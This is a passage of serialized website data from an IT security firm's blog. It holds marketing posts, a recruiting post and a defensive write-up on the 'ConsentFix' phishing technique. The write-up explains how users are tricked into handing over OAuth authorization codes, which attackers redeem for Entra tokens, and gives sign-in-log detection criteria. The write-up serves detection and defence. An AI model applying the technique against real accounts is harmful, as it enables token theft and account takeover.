Developed in close collaboration with customers, these agents are designed from day one for real security challenges: fully integrated, enterprise-ready and built to simplify and accelerate your security operations.","Microsoft Security Store Preview, Security Copilot Agents, glueckkanja Microsoft partner, Microsoft-native security solutions, AI cybersecurity tools, Entra security agents, Intune security automation, Purview compliance agents, Microsoft Copilot cloud security, simplify Microsoft Security operations",[18276,18278],{"lang":2260,"href":18277},"/de/posts/2025-09-30-security-store",{"lang":2257,"href":18279},"/en/posts/2025-09-30-security-store",{"items":18281},[18282],{"text":18283,"name":18284,"position":18285,"company":2720},"A Forensic Agent from glueckkanja AG enables in-depth analysis of Defender XDR incidents and thus accelerates investigations. At the same time, the Privileged Admin Watchdog Agent helps enforce the principle of Zero Standing Privilege by eliminating permanent administrative identities. Together with six other agents in the Security Store, glueckkanja AG demonstrates how organizations can effectively address a wide range of security and IT challenges.","Dorothy Li","Corporate Vice President, Security Copilot, Ecosystem and Marketplace",{"quote":2180,"infos":18287},{"bgColor":2200,"headline":18288,"subline":18289,"level":41,"textStyling":2203,"flush":2204,"person":18290,"form":18292},"Contact us","Want to know how our 10 Microsoft-native Security Copilot agents simplify your operations across Security, Entra, Intune and Purview? 
Fill in the form and we will share information, demos and practical examples tailored to your needs.",{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":18291},"What our customers gain with us is time and clarity: security teams spend less effort on manual analysis and incident resolution, and can focus on the threats that really matter. With our 10 Security Copilot agents, we help you strengthen your security, reduce costs and simplify day-to-day work directly in Microsoft Security.",{"ctaText":2212,"cta":18293,"method":2168,"action":2215,"fields":18294},{"skin":2214},[18295,18296,18297,18298,18300,18302,18303,18304,18306,18307,18308],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":18299,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},"Your message to us",{"label":18301,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},"Your data will be stored and used to respond to your request. 
More details in our \u003Ca href=\"/es/privacy\">Privacy Policy\u003C/a>.",{"type":2240,"id":2241,"value":2175},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":18305},"Form: Blog Microsoft Security Store | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},{"noMargin":2180},{"slick":2180},"/posts/2025-09-30-security-store",{"title":18157,"description":65},"posts/2025-09-30-security-store",[18315,18316,18317],"AI Agents","Security Copilot","Microsoft Security","dwaJ1x1mnd4TCJUd7W2GEBuqPv7iM5zz7Zvq8uOvLvM",{"id":18320,"title":18321,"author":18322,"body":18323,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18453,"moment":2165,"navigation":2180,"path":18485,"seo":18486,"stem":18487,"tags":18488,"webcast":2167,"__hash__":18490},"content_es/posts/2025-10-07-prevent-cyber-attacks.md","Preventing cyberattacks: How companies build resilience with IT structures",[2460],{"type":9,"value":18324,"toc":18444},[18325,18327,18331,18333,18336,18339,18343,18345,18349,18351,18359,18362,18366,18368,18376,18379,18387,18391,18393,18401,18408,18412,18414,18422,18425,18429,18431,18434,18437],[22,18326],{},[41,18328,18330],{"id":18329},"por-qué-los-ciberataques-tienen-tanto-éxito","Why cyberattacks are so successful",[12,18332,31],{},[12,18334,18335],{},"Ransomware attacks are no coincidence. Attackers deliberately choose times when companies have fewer staff on hand, such as weekends. They exploit weaknesses such as outdated authentication processes, unpatched systems or misconfigured access points. A common mistake: the lack of a unified security concept. 
Instead of a well-designed overall strategy, many companies rely on isolated measures that prove insufficient against complex attacks.",[12,18337,18338],{},"However, there are well-proven approaches: a security model based on zero trust principles, as well as a clear structuring of access rights and automation to enable a rapid response in an emergency.",[41,18340,18342],{"id":18341},"tres-pilares-para-una-estrategia-de-seguridad-de-ti-sólida","Three pillars for a solid IT security strategy",[12,18344,31],{},[41,18346,18348],{"id":18347},"infraestructura-segura-la-base-de-la-resiliencia","Secure infrastructure: the foundation of resilience",[12,18350,47],{},[12,18352,18353,18354,18358],{},"A resilient IT infrastructure must not only work reliably but also actively close security gaps. In our example, 300 computers had to be isolated. The first step was therefore the complete reinstallation of a clean environment, based on our ",[2630,18355,18357],{"href":18356},"https://www.glueckkanja.com/es/azure/azure-foundation?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Azure Foundation",". This cloud infrastructure follows clear security guidelines and is deployed in a standardized way using Infrastructure-as-Code (IaC). This way, security configurations can be checked and updated automatically according to best practices.",[12,18360,18361],{},"Another advantage: applying zero trust principles ensures that workloads are segmented and only enabled for authorized connections. 
Así, la superficie de ataque se mantiene al mínimo.",[41,18363,18365],{"id":18364},"la-seguridad-comienza-con-la-autenticación","La seguridad comienza con la autenticación",[12,18367,47],{},[12,18369,18370,18371,18375],{},"En casi todos los ciberataques, la gestión de identidades es el primer punto de ataque. Las contraseñas solas ya no son suficientes. Con ",[2630,18372,18374],{"href":18373},"https://www.glueckkanja.com/es/modern-workplace/azure-active-directory?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Entra ID",", las cuentas de usuario pueden se gestionan y protegen de forma centralizada. La autenticación multifactor (MFA) es el estándar.",[12,18377,18378],{},"Otra ventaja: las actividades sospechosas se detectan y revisan automáticamente. Por ejemplo, si un usuario inicia sesión desde otra ubicación en pocos minutos, el sistema lo identifica como posible amenaza y bloquea el acceso de inmediato.",[12,18380,18381,18382,18386],{},"Para detectar atacantes en la infraestructura, se utilizan sistemas avanzados como Extended Detection and Response (XDR) y Security Information and Event Management (SIEM). Estas soluciones consolidan alarmas y eventos, los analizan y permiten una evaluación rápida. Un SOC gestionado, como el ",[2630,18383,18385],{"href":18384},"https://www.glueckkanja.com/es/security/cloud-security-operations-center?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Cloud Security Operations Center"," de glueckkanja, ayuda a aprovechar al máximo estas tecnologías.",[41,18388,18390],{"id":18389},"restaurar-los-puestos-de-trabajo-rápidamente","Restaurar los puestos de trabajo rápidamente",[12,18392,47],{},[12,18394,18395,18396,18400],{},"Tras un ataque, los empleados deben poder reanudar su trabajo lo antes posible. 
Las soluciones en la nube como ",[2630,18397,18399],{"href":18398},"https://www.glueckkanja.com/es/modern-workplace/microsoft-intune?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Microsoft Intune"," son esenciales para lograrlo. Los dispositivos pueden restablecerse y configurarse por completo desde un portal central, sin importar la ubicación del usuario.",[12,18402,18403,18404,18407],{},"La ventaja: los empleados pueden realizar el proceso ellos mismos sin que el departamento de TI tenga que configurar manualmente cada dispositivo. Además, plataformas como ",[2630,18405,18237],{"href":18406},"https://www.realmjoin.com/?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," distribuyen automáticamente todos los paquetes de software necesarios y aseguran la instalación de las actualizaciones de seguridad.",[41,18409,18411],{"id":18410},"protección-de-emergencia-azere-como-solución-de-contingencia","Protección de emergencia: AzERE como solución de contingencia",[12,18413,31],{},[12,18415,18416,18417,18421],{},"Un incidente como este demuestra lo importante que es contar con una estrategia de emergencia. ",[2630,18418,18420],{"href":18419},"https://www.glueckkanja.com/es/azure/azure-emergency-response-environment?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","AzERE"," (Azure Emergency Response Environment) ofrece un entorno aislado en el que sistemas críticos como el controlador de dominio se replican en una instancia segura “Dark Tenant”. Esto permite acceder a una versión limpia de los datos, incluso ante un ataque a gran escala.",[12,18423,18424],{},"Además, AzERE facilita la creación de una “War Room” digital: una plataforma donde todas las partes implicadas se reúnen para coordinar acciones en tiempo real. 
Esta capacidad de comunicación central puede ser decisiva cuando cada minuto cuenta.",[41,18426,18428],{"id":18427},"conclusión-resiliencia-proactiva-en-lugar-de-reaccionar-ante-amenazas","Conclusión: resiliencia proactiva en lugar de reaccionar ante amenazas",[12,18430,31],{},[12,18432,18433],{},"Este incidente demuestra que un concepto de seguridad efectivo requiere más que soluciones aisladas. Se necesita una combinación de infraestructura cloud segura, gestión de identidades robusta y un entorno de trabajo moderno que pueda restaurarse rápidamente.",[12,18435,18436],{},"Y por eso nuestras historias de IT Workaholics tratan sobre personas cuyas operaciones de TI hemos logrado llevar del modo crisis a la normalidad.",[12,18438,18439,18440,1266],{},"¡Lee ahora las ",[2630,18441,18443],{"href":18442},"https://www.glueckkanja.com/es/it-workaholics?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","historias de IT Workaholics",{"title":65,"searchDepth":111,"depth":111,"links":18445},[18446,18447,18448,18449,18450,18451,18452],{"id":18329,"depth":111,"text":18330},{"id":18341,"depth":111,"text":18342},{"id":18347,"depth":111,"text":18348},{"id":18364,"depth":111,"text":18365},{"id":18389,"depth":111,"text":18390},{"id":18410,"depth":111,"text":18411},{"id":18427,"depth":111,"text":18428},{"lang":2170,"seoTitle":18454,"titleClass":2172,"date":18455,"categories":18456,"blogtitlepic":18457,"socialimg":18458,"customExcerpt":18459,"keywords":18460,"contactInContent":18461,"hreflang":18478,"footer":18483,"scripts":18484,"published":2180},"Prevención de ciberataques: Cómo las empresas construyen resiliencia con estructuras de TI ","2025-10-07",[2175],"head-preventing-cyber-attacks","/blog/heads/head-preventing-cyber-attacks.png","Sábado por la mañana, en algún lugar de Alemania. 
Mientras muchos apenas comienzan el fin de semana, nuestro equipo detecta las primeras señales de alerta en los sistemas de una empresa cliente: actividades inusuales que encienden todas las alarmas. Un análisis rápido confirma la sospecha: ransomware. En cuestión de minutos, los sistemas críticos quedan comprometidos. Lo que sigue es una carrera contrarreloj: asegurar los sistemas, aislar las áreas críticas y comenzar el proceso de recuperación.","Security, CSOC, Microsoft Security, Cyber Attacks, Prevention",{"quote":2180,"infos":18462},{"bgColor":2200,"headline":18288,"subline":18289,"level":41,"textStyling":2203,"flush":2204,"person":18463,"form":18464},{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":18291},{"ctaText":2212,"cta":18465,"method":2168,"action":2215,"fields":18466},{"skin":2214},[18467,18468,18469,18470,18471,18472,18473,18474,18475,18476,18477],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":18299,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},{"label":18301,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},{"type":2240,"id":2241,"value":2175},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":18305},{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},[18479,18481],{"lang":2260,"href":18480},"/de/posts/2025-10-07-prevent-cyber-attacks.md",{"lang":2257,"href":18482},"/en/posts/2025-10-07-prevent-cyber-attacks.md",{"noMargin":2180},{"slick":2180},"/posts/2025-10-07-prevent-cyber-attacks",{"title":18321,"description":65},"posts/2025-10-07-prevent-cyber-attacks",[2175,18489],"CSOC","8XfvGmoc_Vp9I7eKLekOYvL5JXu6Qkohzojhk_usGdQ",{"id":18492,"title":18493,"author":18494,"body":18495,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":
2168,"meta":18574,"moment":18575,"navigation":2180,"path":18622,"seo":18623,"stem":18624,"tags":18625,"webcast":2167,"__hash__":18626},"content_es/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first at the airport: Microsoft Partner of the Year Awards 2025",[2460],{"type":9,"value":18496,"toc":18568},[18497,18501,18503,18506,18509,18513,18515,18518,18521,18535,18538,18542,18546,18548,18551,18555,18557,18560],[41,18498,18500],{"id":18499},"from-the-runway-to-the-cloud","From the runway to the cloud",[12,18502,31],{},[12,18504,18505],{},"Fraport operates 29 airports worldwide, including Frankfurt Airport, one of Europe's largest transportation hubs. More than 80,000 employees keep operations running every day, from baggage handling to IT security. To make all this work, you need a reliable, scalable, and secure digital infrastructure.",[12,18507,18508],{},"That's where the joint project between Fraport and glueckkanja came in: the existing VDI environment was to be replaced with a modern, cloud-based workplace architecture. The goal: more flexibility, less complexity, and a platform built for a globally connected organization.",[41,18510,18512],{"id":18511},"cloud-managed-workplace","Cloud Managed Workplace",[12,18514,31],{},[12,18516,18517],{},"At the core lies the combination of Windows 365 Cloud PCs and the Microsoft Intune Suite. 
Today, more than 16,500 endpoints are centrally deployed, managed, and secured.",[12,18519,18520],{},"The results:",[1255,18522,18523,18526,18529,18532],{},[1258,18524,18525],{},"Device provisioning in minutes instead of hours",[1258,18527,18528],{},"Automated processes for higher efficiency",[1258,18530,18531],{},"Transparent management and monitoring",[1258,18533,18534],{},"A Zero Trust security model across all devices",[12,18536,18537],{},"The outcome: a workplace concept that enables Fraport employees to work securely and flexibly across all locations, devices, and roles.",[2688,18539],{":quotes":18540,":no-fullscreen":7656,"spacing":18541},"quoteMicrosoft","mb-10",[41,18543,18545],{"id":18544},"recognition-for-innovation-and-collaboration","Recognition for innovation and collaboration",[12,18547,31],{},[12,18549,18550],{},"Each year, Microsoft honors partners who deliver outstanding cloud solutions, services, and innovations. In a global competition with more than 4,600 submissions, glueckkanja was recognized for the successful implementation of the Fraport project, a strong signal for the growing importance of cloud-based workplace solutions in critical infrastructures.",[41,18552,18554],{"id":18553},"a-blueprint-for-modern-workplace-architecture","A blueprint for modern workplace architecture",[12,18556,31],{},[12,18558,18559],{},"This project demonstrates how complex infrastructures can be reimagined through the cloud — without compromising on security or user experience. For Fraport, it marked the move to a standardized, cloud-based workplace model. 
For glueckkanja, it’s a proof point of how modern IT strategies can scale sustainably.",[12,18561,18562,18563,1014],{},"The full list of award-winning projects can be found ",[2630,18564,18567],{"href":18565,"rel":18566},"https://aka.ms/2025POTYAWinnersFinalists",[3135],"here",{"title":65,"searchDepth":111,"depth":111,"links":18569},[18570,18571,18572,18573],{"id":18499,"depth":111,"text":18500},{"id":18511,"depth":111,"text":18512},{"id":18544,"depth":111,"text":18545},{"id":18553,"depth":111,"text":18554},{"lang":2170,"seoTitle":18493,"titleClass":2172,"date":18575,"categories":18576,"blogtitlepic":18577,"socialimg":18578,"customExcerpt":18579,"keywords":18580,"contactInContent":18581,"hreflang":18610,"scripts":18615,"quoteMicrosoft":18616},"2025-11-12",[2663],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Out of more than 4,600 nominations from over 100 countries, one project stood out as a showcase of what modern IT can look like: together with Fraport, glueckkanja was recognized at the Microsoft Partner of the Year Awards 2025 in the Cloud Endpoints category.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Case Study, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Security, Modern Workplace, Cloud-first strategy, Digital workplace transformation, Endpoint management, Device provisioning automation, Secure cloud infrastructure, Scalable IT architecture, Cloud governance and compliance, Enterprise mobility and security, Airport IT infrastructure, Aviation digital transformation, Critical infrastructure IT, Global operations, Remote workforce enablement, IT modernization in transportation, Cloud-based workplace for critical infrastructure, Microsoft Windows 365 and Intune in enterprise environments, Secure and scalable endpoint management, Transforming airport IT operations with 
Azure",{"quote":2180,"infos":18582},{"bgColor":2200,"color":2993,"boxBgColor":2992,"boxColor":2993,"headline":18583,"subline":18584,"level":41,"textStyling":2203,"flush":2204,"person":18585,"form":18591},"Get in Touch","Want to learn more about the project and our award? We'd be happy to show you how Fraport’s journey toward a standardized cloud architecture was brought to life.",{"image":2996,"cloudinary":2180,"alt":2419,"name":2419,"quotee":2419,"quoteeTitle":2997,"quote":18586,"detailsHeader":18587,"details":18588},"The project with Fraport shows how standardization and automation can enable a secure, scalable workplace model, exactly what's needed to run and evolve IT environments reliably over the long term.","We’re looking forward\u003Cbr />to hearing from you!",[18589,18590],{"text":2812,"href":2813,"details":3001,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":18592,"cta":18593,"method":2168,"action":16992,"fields":18594},"Submit",{"skin":2214},[18595,18596,18597,18598,18601,18603,18604,18605,18607,18608,18609],{"label":16995,"type":61,"id":2219,"required":2180,"requiredMsg":16996},{"label":16998,"type":61,"id":2223,"required":2180,"requiredMsg":16999},{"label":17001,"type":2227,"id":2227,"required":2180,"requiredMsg":17002},{"label":18599,"type":2231,"id":2232,"required":2167,"requiredMsg":18600},"Your message to us","Please enter a message.",{"label":18602,"type":2236,"id":2237,"required":2180,"requiredMsg":17005},"Your data will be stored and used to respond to your request. 
For more details, please see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2240,"id":2241,"value":2663},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":18606},"Form: Blog Microsoft Partner of the Year | EN",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},[18611,18613],{"lang":2257,"href":18612},"/en/posts/2025-11-12-partner-of-the-year-awards",{"lang":2260,"href":18614},"/de/posts/2025-11-12-partner-of-the-year-awards",{"slick":2180,"form":2180},{"items":18617},[18618],{"text":18619,"name":18620,"company":18621,"alt":18620},"By moving to Windows 365 Cloud PCs and the Intune Suite, we've achieved a new level of agility and security. The collaboration with glueckkanja has laid the foundation for future innovation.","Niklas Rast","Senior Solution Architect at Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":18493,"description":65},"posts/2025-11-12-partner-of-the-year-awards",[2719,3025],"pbzKYH6UV-drvjQPoYsGjV6CUVlyIqlW-2gGPswAr_w",{"id":18628,"title":18629,"author":18630,"body":18631,"cta":2165,"description":18635,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18732,"moment":18733,"navigation":2180,"path":18745,"seo":18746,"stem":18747,"tags":18748,"webcast":2167,"__hash__":18749},"content_es/posts/2025-12-08-recruiting-process.md","Nuestro Proceso de Solicitud Explicado",[2550],{"type":9,"value":18632,"toc":18724},[18633,18636,18639,18642,18653,18657,18659,18662,18665,18669,18671,18674,18685,18688,18692,18694,18697,18701,18703,18706,18710,18712,18715,18719,18721],[12,18634,18635],{},"A menudo nos preguntan: ¿Qué necesito aportar y qué es importante para ustedes?",[12,18637,18638],{},"Lo que es importante para nosotros es que estés entusiasmado por trabajar en una empresa tecnológica innovadora. 
Nos vemos como un equipo que tira en la misma dirección.",[12,18640,18641],{},"Y estamos buscando personas que sean tan apasionadas por la tecnología como nosotros:",[1255,18643,18644,18647,18650],{},[1258,18645,18646],{},"Que no rehúyan los desafíos sino que prosperen cuando pueden sumergirse en temas complejos.",[1258,18648,18649],{},"Que cuestionen el status quo y desarrollen apasionadamente nuevas soluciones innovadoras – para glueckkanja y nuestros clientes.",[1258,18651,18652],{},"Que disfruten ser parte de una comunidad, compartiendo su conocimiento y aprendiendo unos de otros.",[186,18654,18656],{"id":18655},"paso-1-tu-solicitud","Paso 1: Tu Solicitud",[12,18658,31],{},[12,18660,18661],{},"Has enviado tus documentos – ¡el primer paso está hecho! En nuestra empresa, ninguna IA revisa tu solicitud, sino nuestro equipo de reclutamiento personalmente. ¿Te preguntas quién está detrás del equipo de reclutamiento? ¡Aquí estamos!",[12,18663,18664],{},"Nosotros – eso es Kerstin, Anna, Steffi y Jan – nos tomamos el tiempo para revisar cuidadosamente tu CV y verificar si tu experiencia y habilidades coinciden con nuestros requisitos. Nuestro objetivo: Recibirás comentarios de nosotros en máximo 1–2 semanas, pero generalmente después de solo unos días. Sabemos lo angustiosa que puede ser la espera.",[186,18666,18668],{"id":18667},"paso-2-conociendo-a-las-personas-y-la-cultura","Paso 2: Conociendo a las Personas y la Cultura",[12,18670,31],{},[12,18672,18673],{},"Si tu perfil encaja, pasamos a la primera ronda. No te preocupes – ¡no necesitas estar nervioso! Ya has causado una gran primera impresión con tu CV. 
En la conversación, queremos conocerte como persona:",[1255,18675,18676,18679,18682],{},[1258,18677,18678],{},"¿Quién eres?",[1258,18680,18681],{},"¿Qué te motiva?",[1258,18683,18684],{},"¿Qué buscas en tu futuro?",[12,18686,18687],{},"Se trata de un encuentro abierto y honesto de igual a igual.",[186,18689,18691],{"id":18690},"paso-3-intercambio-técnico-con-tu-futuro-líder","Paso 3: Intercambio Técnico con tu Futuro Líder",[12,18693,31],{},[12,18695,18696],{},"En la segunda conversación, conocerás a tu líder. Ahora se pone un poco más técnico: Discutimos tus habilidades profesionales y puedes hacer todas las preguntas sobre tareas, equipo y proyectos. Un poco de emoción es natural – ¡pero hey, ya estás un paso más adelante!",[186,18698,18700],{"id":18699},"paso-4-encuentro-con-el-equipo-y-verificación-cultural","Paso 4: Encuentro con el Equipo y Verificación Cultural",[12,18702,31],{},[12,18704,18705],{},"En glueckkanja, la cultura es más que una palabra – es nuestra vida diaria. Por eso en el último paso conocerás a tu equipo potencial. Queremos asegurar que sea un buen ajuste para ambas partes – profesional y personalmente.",[186,18707,18709],{"id":18708},"final-tu-oferta","Final: Tu Oferta",[12,18711,31],{},[12,18713,18714],{},"¿Nos has convencido? Entonces viene la conversación personal de oferta. Aquí aclaramos todos los detalles sobre la oferta y respondemos todas tus preguntas finales.",[186,18716,18718],{"id":18717},"por-qué-tantos-pasos","¿Por Qué Tantos Pasos?",[12,18720,31],{},[12,18722,18723],{},"Simple: Queremos asegurar que te sientas cómodo con nosotros y que tengamos éxito juntos. 
Todas las conversaciones se realizan de igual a igual – y el tuteo es natural para nosotros.",{"title":65,"searchDepth":111,"depth":111,"links":18725},[18726,18727,18728,18729,18730,18731],{"id":18655,"depth":329,"text":18656},{"id":18667,"depth":329,"text":18668},{"id":18690,"depth":329,"text":18691},{"id":18699,"depth":329,"text":18700},{"id":18708,"depth":329,"text":18709},{"id":18717,"depth":329,"text":18718},{"lang":2170,"seoTitle":18629,"titleClass":2172,"date":18733,"categories":18734,"blogtitlepic":18735,"socialimg":18736,"customExcerpt":18737,"keywords":18738,"hreflang":18739,"scripts":18744},"2025-12-08",[2663],"head-recruiting-process","/heads/head-recruiting-process.png","¿Has descubierto una posición emocionante con nosotros y quieres postularte? Genial – ¡siempre estamos felices de dar la bienvenida a nuevos talentos! ¿Pero qué sucede después de hacer clic en 'Enviar Solicitud'? Aquí te damos una mirada detrás de escena.","Reclutamiento, Proceso de Solicitud, Empleos en Empresa de TI",[18740,18742],{"lang":2260,"href":18741},"/de/posts/2025-12-08-recruiting-process.md",{"lang":2257,"href":18743},"/en/posts/2025-12-08-recruiting-process.md",{"slick":2180,"form":2180},"/posts/2025-12-08-recruiting-process",{"title":18629,"description":18635},"posts/2025-12-08-recruiting-process",[3096,3097,3095],"Rt9E79kYvWE03E5zZ0R4APgXGYB1thZZ6XX0UMasOuc",{"id":18751,"title":18752,"author":18753,"body":18754,"cta":2165,"description":18758,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":19536,"moment":19538,"navigation":2180,"path":19564,"seo":19565,"stem":19566,"tags":19567,"webcast":2167,"__hash__":19570},"content_es/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka 
ConsentFix",[2493,2372,2529],{"type":9,"value":18755,"toc":19516},[18756,18759,18762,18765,18771,18774,18777,18786,18791,18799,18819,18822,18828,18831,18834,18840,18845,18849,18859,18865,18868,18871,18875,18878,18884,18891,18894,18914,18924,18928,18931,18934,18937,18940,18944,18947,18950,18967,18976,18980,18984,19004,19008,19013,19024,19027,19033,19037,19051,19055,19066,19070,19073,19081,19084,19092,19095,19103,19107,19110,19131,19134,19198,19201,19204,19207,19210,19213,19219,19222,19263,19267,19282,19286,19290,19304,19307,19310,19315,19318,19329,19333,19340,19344,19350,19355,19369,19375,19381,19387,19398,19401,19407,19410,19435,19443,19447,19467,19473,19476,19482,19486],[12,18757,18758],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[12,18760,18761],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. 
Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[12,18763,18764],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[12,18766,18767],{},[2772,18768],{"alt":18769,"src":18770},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[12,18772,18773],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[12,18775,18776],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[12,18778,18779,18780,18785],{},"You can easily reproduce this yourself, for example by using ",[2630,18781,18784],{"href":18782,"rel":18783},"https://github.com/f-bader/TokenTacticsV2",[3135],"TokenTacticsV2",", or by crafting the URI manually.",[12,18787,18788],{},[2772,18789],{"alt":18784,"src":18790},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[12,18792,18793,18794,18798],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[2630,18795,18796],{"href":18796,"rel":18797},"http://localhost:3001",[3135],". 
In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[1255,18800,18801,18811],{},[1258,18802,18803,18805,18807,18808,18810],{},[251,18804,63],{},[531,18806],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[531,18809],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[1258,18812,18813,18816,18818],{},[251,18814,18815],{},"state",[531,18817],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[12,18820,18821],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[12,18823,18824],{},[2772,18825],{"alt":18826,"src":18827},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[12,18829,18830],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. 
If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[12,18832,18833],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[12,18835,18836],{},[2772,18837],{"alt":18838,"src":18839},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[2109,18841,18842],{},[12,18843,18844],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[41,18846,18848],{"id":18847},"detection-artifacts","Detection artifacts",[12,18850,18851,18852,4598,18855,18858],{},"When you reproduce the attack and check the ",[63,18853,18854],{},"SigninLogs",[63,18856,18857],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[12,18860,18861],{},[2772,18862],{"alt":18863,"src":18864},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[12,18866,18867],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[12,18869,18870],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. 
Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[186,18872,18874],{"id":18873},"missing-link","Missing link",[12,18876,18877],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[12,18879,18880],{},[2772,18881],{"alt":18882,"src":18883},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[12,18885,18886,18887,18890],{},"However, the ",[63,18888,18889],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[12,18892,18893],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[1255,18895,18896,18899,18902,18905,18908,18911],{},[1258,18897,18898],{},"Both events share the same SessionId",[1258,18900,18901],{},"Both events share the same ApplicationId",[1258,18903,18904],{},"Both events share the same UserId",[1258,18906,18907],{},"The second event must be after the first event",[1258,18909,18910],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[1258,18912,18913],{},"You should only consider the very next second event, not subsequent ones",[2109,18915,18916],{},[12,18917,18918,18921,18923],{},[251,18919,18920],{},"Fun fact",[531,18922],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. 
